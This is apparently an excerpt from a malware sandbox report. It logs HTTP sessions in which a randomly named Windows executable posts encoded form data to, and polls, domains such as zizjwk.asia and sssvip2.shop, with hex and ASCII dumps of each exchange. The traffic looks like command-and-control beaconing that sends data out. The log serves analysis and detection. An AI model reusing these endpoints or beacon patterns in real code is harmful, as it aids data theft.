Jan 10, 2025 16:41:49.526331902 CET	498	OUT	GET /6gca/?LH1t=fO7Vv7QIjIHgdzQpzhfCg2Co/QqQlpQJYQYE5YQp2rCSowSjXLls4N42Oq8UvYDhJwN7H88iyToSgsvsMFsw8qgJvlfr1LkCoo0259ZxSwy7A4vC8wcXbhrD0WwCEM58XQ==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.yhk58.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:41:50.399960041 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:41:50 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66946a48-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49996	78.141.202.204	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:55.815737963 CET	747	OUT	POST /s53m/ HTTP/1.1 Host: www.zizjwk.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.zizjwk.asia Referer: http://www.zizjwk.asia/s53m/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 47 79 78 51 54 4b 42 66 43 4b 52 63 6c 4f 52 64 38 62 62 52 4d 74 6d 68 59 69 6f 43 44 41 42 59 2b 44 34 46 6c 51 6e 4d 74 4c 74 7a 49 65 67 68 4f 68 55 79 7a 58 69 6d 41 2b 4d 6a 44 37 6d 6d 7a 32 39 78 58 33 47 55 55 41 56 79 66 2f 70 62 74 64 4e 4b 32 6d 37 75 7a 77 55 34 34 38 37 54 51 79 6c 48 73 35 7a 7a 38 63 4a 71 64 50 4d 6a 52 6b 56 69 47 66 4e 2b 51 6b 2f 68 35 72 6c 5a 32 41 69 50 49 6f 7a 4a 39 79 63 4d 4d 41 32 46 7a 49 33 43 36 33 57 54 67 6e 5a 39 50 62 41 42 56 4f 47 2b 57 43 59 70 46 4f 55 54 39 57 4f 39 30 54 52 32 77 52 6d 4b 58 4e 53 64 64 71 4c 35 55 47 6a 33 62 35 55 3d Data Ascii: LH1t=GyxQTKBfCKRclORd8bbRMtmhYioCDABY+D4FlQnMtLtzIeghOhUyzXimA+MjD7mmz29xX3GUUAVyf/pbtdNK2m7uzwU4487TQylHs5zz8cJqdPMjRkViGfN+Qk/h5rlZ2AiPIozJ9ycMMA2FzI3C63WTgnZ9PbABVOG+WCYpFOUT9WO90TR2wRmKXNSddqL5UGj3b5U=
Jan 10, 2025 16:41:56.379987955 CET	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 15:41:56 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.zizjwk.asia/s53m/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49997	78.141.202.204	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:58.373183012 CET	767	OUT	POST /s53m/ HTTP/1.1 Host: www.zizjwk.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.zizjwk.asia Referer: http://www.zizjwk.asia/s53m/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 47 79 78 51 54 4b 42 66 43 4b 52 63 71 4f 68 64 77 63 48 52 4a 4e 6d 6d 64 69 6f 43 4e 51 42 44 2b 44 30 46 6c 53 4b 52 74 65 39 7a 49 37 6b 68 49 55 67 79 77 58 69 6d 4b 65 4d 73 65 4c 6d 34 7a 78 31 50 58 31 53 55 55 42 31 79 66 2f 35 62 73 73 4e 56 30 32 37 73 31 77 56 65 33 63 37 54 51 79 6c 48 73 36 50 5a 38 59 74 71 63 37 77 6a 52 41 4a 6c 61 76 4e 2f 58 6b 2f 68 75 37 6c 64 32 41 69 74 49 71 57 73 39 30 59 4d 4d 42 47 46 7a 36 50 46 7a 33 57 56 39 58 59 4a 4a 70 42 49 58 2f 69 79 56 54 59 38 4c 2b 4e 75 31 41 2f 58 75 78 5a 77 7a 52 4f 68 58 4f 36 72 59 64 57 52 4f 6c 7a 48 46 75 44 57 6f 51 71 6b 34 48 53 6e 4d 55 51 69 5a 67 35 63 6b 75 6d 50 Data Ascii: LH1t=GyxQTKBfCKRcqOhdwcHRJNmmdioCNQBD+D0FlSKRte9zI7khIUgywXimKeMseLm4zx1PX1SUUB1yf/5bssNV027s1wVe3c7TQylHs6PZ8Ytqc7wjRAJlavN/Xk/hu7ld2AitIqWs90YMMBGFz6PFz3WV9XYJJpBIX/iyVTY8L+Nu1A/XuxZwzROhXO6rYdWROlzHFuDWoQqk4HSnMUQiZg5ckumP
Jan 10, 2025 16:41:58.953907967 CET	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 15:41:58 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.zizjwk.asia/s53m/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49998	78.141.202.204	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:00.918945074 CET	1784	OUT	POST /s53m/ HTTP/1.1 Host: www.zizjwk.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.zizjwk.asia Referer: http://www.zizjwk.asia/s53m/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 47 79 78 51 54 4b 42 66 43 4b 52 63 71 4f 68 64 77 63 48 52 4a 4e 6d 6d 64 69 6f 43 4e 51 42 44 2b 44 30 46 6c 53 4b 52 74 65 31 7a 4c 4e 59 68 4c 33 34 79 78 58 69 6d 4a 65 4d 76 65 4c 6e 39 7a 77 51 49 58 31 75 75 55 45 78 79 65 5a 31 62 72 65 6c 56 75 6d 37 73 35 51 55 35 34 38 37 38 51 79 30 4f 73 36 66 5a 38 59 74 71 63 36 67 6a 47 45 56 6c 4a 2f 4e 2b 51 6b 2b 31 35 72 6c 31 32 42 47 58 49 71 54 5a 38 45 34 4d 4d 68 57 46 67 66 62 46 38 33 57 58 38 58 59 52 4a 70 4e 4c 58 35 47 45 56 54 73 57 4c 38 4e 75 6d 33 43 4f 38 7a 42 47 77 53 58 65 61 38 36 4a 57 61 71 54 4a 32 66 6e 48 64 58 69 6a 6e 69 56 7a 48 71 37 43 6b 42 52 4b 48 74 78 31 4f 7a 79 32 49 33 6b 56 34 4f 63 4a 64 52 52 4d 32 45 30 66 69 31 44 59 2f 59 4f 32 67 57 45 71 5a 69 4e 69 49 4b 6c 79 33 6d 41 43 44 65 56 78 35 64 56 67 68 5a 30 6c 54 45 68 61 6a 46 64 53 62 37 56 58 35 69 36 4d 30 41 2b 73 70 2f 64 41 4b 79 42 57 4a 67 4b 33 64 4a 6f 76 2f 45 4d 71 46 38 5a 54 58 65 52 7a 39 74 36 46 6a 35 36 6f 51 4f 4e 35 [TRUNCATED] Data Ascii: LH1t=GyxQTKBfCKRcqOhdwcHRJNmmdioCNQBD+D0FlSKRte1zLNYhL34yxXimJeMveLn9zwQIX1uuUExyeZ1brelVum7s5QU54878Qy0Os6fZ8Ytqc6gjGEVlJ/N+Qk+15rl12BGXIqTZ8E4MMhWFgfbF83WX8XYRJpNLX5GEVTsWL8Num3CO8zBGwSXea86JWaqTJ2fnHdXijniVzHq7CkBRKHtx1Ozy2I3kV4OcJdRRM2E0fi1DY/YO2gWEqZiNiIKly3mACDeVx5dVghZ0lTEhajFdSb7VX5i6M0A+sp/dAKyBWJgK3dJov/EMqF8ZTXeRz9t6Fj56oQON53MI7ilaYXoCA8COKUgQWvsV8ar/Tfi5rCDpLyNn9YUrVqWalzkzvN9lcw3noT1TkYnwF8Z2IvZkCesjmvRVQ8NIb5tPPvGdU6IOlUq4SrDO9e5PLgur+aguhM5UXHwRMbyNAl5s1FYjfvNtD4vosJe6wos8jyfx7Il6GBuvA30d0VdxeQREi6eirpHyhYQtBvO7rsqEE/FpqQeJoQ5FRV0Taj3un8+cku1Fi67Za5McZOdNKyUpm8JXW3h872g9JuHhZcHRndbgZwAUegyqXZM9I87tFo6A/hDjTKCUZ4QMK3CiWbrpff9w45cMfCJmkQt/T+Ye+YWvEBPdZBjgvdCy7e4ej5JrnBsAKqKekYg4Y+O6GLgbH0+s3pH16jhTUv02XFDTjETj2JvUFi5IAP9/VyUPZpISoObyZR8I9CGOXJ7FSanDixQ96fWGMbAvJ6SoL3mgeNiFpQRdPQVEbifCdHD/Mq1Z1+eRXxGFoMEIiwuC1wYJrm5bxaTSw33iY9GVuYzx0WvPZIQ5208TdwQzfzaE6nn4o5W2gudPk2dFGPKeHDLFAcNxAEmzmdb3WbR584pPY6oMGrtcKjMigb8eiweN8PY5dPg+P/B23PAzpseLz/e6a0UEupv3Qc5pwVkmLgfM5zvtLiv2KVbnzEvz1YfRQFdUXoO [TRUNCATED]
Jan 10, 2025 16:42:01.514224052 CET	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 15:42:01 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.zizjwk.asia/s53m/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49999	78.141.202.204	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:03.464699030 CET	500	OUT	GET /s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9lt1XWmLZF5oY+x7iJ9G+2momiNt1MLXajJv2P/Ny5BJRrEwaDRFNfY0RmDClZANlQ==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.zizjwk.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:42:04.039510965 CET	556	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 15:42:03 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9lt1XWmLZF5oY+x7iJ9G+2momiNt1MLXajJv2P/Ny5BJRrEwaDRFNfY0RmDClZANlQ==&fpJ=16J40rx8bHP8SV Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	50000	156.253.8.115	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:09.118288040 CET	750	OUT	POST /160b/ HTTP/1.1 Host: www.sssvip2.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.sssvip2.shop Referer: http://www.sssvip2.shop/160b/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 73 55 67 47 66 79 39 45 70 30 4f 53 46 75 62 6e 6d 53 5a 70 79 41 4e 48 6f 47 38 68 55 66 42 58 4b 74 52 32 49 79 70 4c 52 77 61 44 79 39 73 6c 63 52 43 44 67 53 63 66 74 4c 44 55 66 44 6a 55 41 78 70 31 70 62 6b 37 75 43 4e 69 4e 78 61 49 65 42 36 4c 43 69 78 71 4e 47 4d 70 62 52 4a 4e 37 2f 46 66 33 6b 57 57 5a 39 71 30 4a 51 71 48 2f 77 46 51 65 62 4e 5a 63 44 30 32 45 65 32 42 4d 38 59 32 65 74 6d 50 62 39 44 58 58 52 33 4f 53 6f 76 77 57 52 71 57 41 32 6f 53 59 62 6d 5a 34 41 59 4f 78 73 74 30 53 33 45 49 30 78 33 6f 37 32 31 62 47 48 4b 75 42 65 56 54 71 32 4e 72 59 33 57 66 77 36 67 3d Data Ascii: LH1t=sUgGfy9Ep0OSFubnmSZpyANHoG8hUfBXKtR2IypLRwaDy9slcRCDgScftLDUfDjUAxp1pbk7uCNiNxaIeB6LCixqNGMpbRJN7/Ff3kWWZ9q0JQqH/wFQebNZcD02Ee2BM8Y2etmPb9DXXR3OSovwWRqWA2oSYbmZ4AYOxst0S3EI0x3o721bGHKuBeVTq2NrY3Wfw6g=
Jan 10, 2025 16:42:10.046863079 CET	339	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 10 Jan 2025 15:42:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-control: no-cache,must-revalidate Location: /home/login Set-Cookie: PHPSESSID=0d54688b951b80508fe110308ffcf0be; path=/ Strict-Transport-Security: max-age=31536000 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	50001	156.253.8.115	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:11.674416065 CET	770	OUT	POST /160b/ HTTP/1.1 Host: www.sssvip2.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.sssvip2.shop Referer: http://www.sssvip2.shop/160b/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 73 55 67 47 66 79 39 45 70 30 4f 53 45 4f 4c 6e 6e 31 31 70 77 67 4e 45 30 57 38 68 65 2f 42 54 4b 74 64 32 49 77 5a 62 51 44 75 44 79 63 63 6c 62 51 43 44 6a 53 63 66 6c 72 44 64 53 6a 6a 4c 41 78 6c 4c 70 61 49 37 75 43 4a 69 4e 30 65 49 65 51 36 49 44 79 78 6f 4c 47 4d 72 57 78 4a 4e 37 2f 46 66 33 6b 44 39 5a 37 43 30 4a 68 61 48 35 52 46 52 64 62 4e 65 62 44 30 32 41 65 32 46 4d 38 5a 62 65 6f 2b 31 62 37 48 58 58 54 76 4f 53 39 4f 43 44 42 71 63 4f 57 6f 48 55 59 37 30 39 41 6b 72 79 39 56 6e 4d 42 63 52 78 48 47 43 68 55 39 64 46 48 69 46 42 64 39 6c 76 42 51 44 43 55 47 76 75 74 33 77 53 62 78 72 48 52 76 78 6a 76 75 6d 56 43 6f 59 4d 33 49 38 Data Ascii: LH1t=sUgGfy9Ep0OSEOLnn11pwgNE0W8he/BTKtd2IwZbQDuDycclbQCDjScflrDdSjjLAxlLpaI7uCJiN0eIeQ6IDyxoLGMrWxJN7/Ff3kD9Z7C0JhaH5RFRdbNebD02Ae2FM8Zbeo+1b7HXXTvOS9OCDBqcOWoHUY709Akry9VnMBcRxHGChU9dFHiFBd9lvBQDCUGvut3wSbxrHRvxjvumVCoYM3I8
Jan 10, 2025 16:42:12.601409912 CET	339	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 10 Jan 2025 15:42:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-control: no-cache,must-revalidate Location: /home/login Set-Cookie: PHPSESSID=a2439b8b991923fc2faee3c87ec97535; path=/ Strict-Transport-Security: max-age=31536000 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	50002	156.253.8.115	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:14.240464926 CET	1787	OUT	POST /160b/ HTTP/1.1 Host: www.sssvip2.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.sssvip2.shop Referer: http://www.sssvip2.shop/160b/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 73 55 67 47 66 79 39 45 70 30 4f 53 45 4f 4c 6e 6e 31 31 70 77 67 4e 45 30 57 38 68 65 2f 42 54 4b 74 64 32 49 77 5a 62 51 43 57 44 7a 75 45 6c 62 79 71 44 69 53 63 66 72 4c 44 59 53 6a 69 58 41 79 56 78 70 61 56 4d 75 45 56 69 4d 53 69 49 50 53 43 49 4a 79 78 6f 4a 47 4d 6d 62 52 49 5a 37 2b 31 62 33 6b 54 39 5a 37 43 30 4a 6a 43 48 35 41 46 52 62 62 4e 5a 63 44 30 36 45 65 32 39 4d 38 41 75 65 70 75 66 62 72 6e 58 58 7a 2f 4f 65 75 6d 43 65 78 71 61 4a 57 70 43 55 59 33 33 39 41 34 4a 79 39 78 4a 4d 47 34 52 7a 41 44 38 38 48 42 58 66 6d 6a 33 44 4e 70 56 78 7a 51 45 4a 30 4b 75 6c 39 72 47 51 4f 35 39 4f 41 58 74 69 50 69 72 4c 55 6f 31 4a 43 52 77 39 71 50 56 2b 7a 62 4e 41 44 6b 59 69 2b 57 44 55 79 66 46 50 6c 66 63 73 61 4e 45 4b 52 68 6a 38 6b 4a 78 4d 4e 30 53 4b 6b 30 50 46 6b 63 50 72 46 55 39 39 7a 6d 55 41 75 48 7a 7a 6a 6c 62 49 37 2f 55 2b 7a 71 4d 30 4e 57 6e 44 71 64 4c 49 63 61 4c 6e 78 38 4e 6d 45 6a 4b 37 38 2f 61 59 48 58 7a 39 39 44 61 51 6a 71 63 4b 63 68 6f 50 [TRUNCATED] Data Ascii: LH1t=sUgGfy9Ep0OSEOLnn11pwgNE0W8he/BTKtd2IwZbQCWDzuElbyqDiScfrLDYSjiXAyVxpaVMuEViMSiIPSCIJyxoJGMmbRIZ7+1b3kT9Z7C0JjCH5AFRbbNZcD06Ee29M8AuepufbrnXXz/OeumCexqaJWpCUY339A4Jy9xJMG4RzAD88HBXfmj3DNpVxzQEJ0Kul9rGQO59OAXtiPirLUo1JCRw9qPV+zbNADkYi+WDUyfFPlfcsaNEKRhj8kJxMN0SKk0PFkcPrFU99zmUAuHzzjlbI7/U+zqM0NWnDqdLIcaLnx8NmEjK78/aYHXz99DaQjqcKchoPxE/jVn995HvHr6+dCXuXsjDNLeJMJRXrbyyRWz0lncP5iWkwSZKUN38SkIGlxXte65i5WCzpAkY/OuRqWinJsg+0/2T3FjxXjzPf2WrHURc43jPh3RjaTYgFMMJr4uDGetspQRb25bN2pRIYCHrXClL940Ye2uGz4T2ORHkVenk7JDfJNmVvxr14vff4CDfqQvwRdFfhxbJB24ETwOj7c97O4JrEl6xv8GV94aWDhbDxoVd2prH4sQyMHNB+sX1bcBSRPA8uoiNKegLmcb1/gBUOuRoif6XdbcHxZcJaF2Las5aGrdRL47Zl3BCZMuSHza0Om05yEMbNUVwtPh4/a736F9Uc2j2Lbpy3ZqGi07OVCUyyAbmmW0is5b9xTN37OPFu34V7M19zp0jLJ7E4gKZcgKo+ql7F5y5a9IQ3suyxIokSdSeaLkPsjmHoELywkpYA5qtxDW9fE9wSWwf7qjCJ7y5wMBuXkfHo7Xq0CviUATRJC0VO22dEsnVYamzqnNRPX/KJWlQR1PTTyD+lkOtJ4FCexg643J6dtwWdZgVW8aOddMChDMbT5zlNc3drgyp1239zFexS6ZeK+oAiX3Ls6KjasFMOX31UnTRaXg4RgqwwpOPVdukBChdaEfTIzFmVjJ2e0KjyEgjRBcPBhkm8uppHxWS6yk [TRUNCATED]
Jan 10, 2025 16:42:15.149980068 CET	339	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 10 Jan 2025 15:42:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-control: no-cache,must-revalidate Location: /home/login Set-Cookie: PHPSESSID=84e1f766c9a7a433f601684ff0879e48; path=/ Strict-Transport-Security: max-age=31536000 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	50003	156.253.8.115	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:16.793315887 CET	501	OUT	GET /160b/?LH1t=hWImcCcxiU/zFpbJ3SQ6wCxR9Fc5S9wUNOZCazoCcTKnw7sgTnGdjC8u7pn2czzrGxdfpZQLpAAjKTjZJ1WZPS8feXQCRiRlu+tLtQzibMS7IgX58gEncot0bgcnEtvyQA==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.sssvip2.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:42:17.733213902 CET	339	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 10 Jan 2025 15:42:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-control: no-cache,must-revalidate Location: /home/login Set-Cookie: PHPSESSID=8f296ca12fb133818be91a720da0789e; path=/ Strict-Transport-Security: max-age=31536000 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
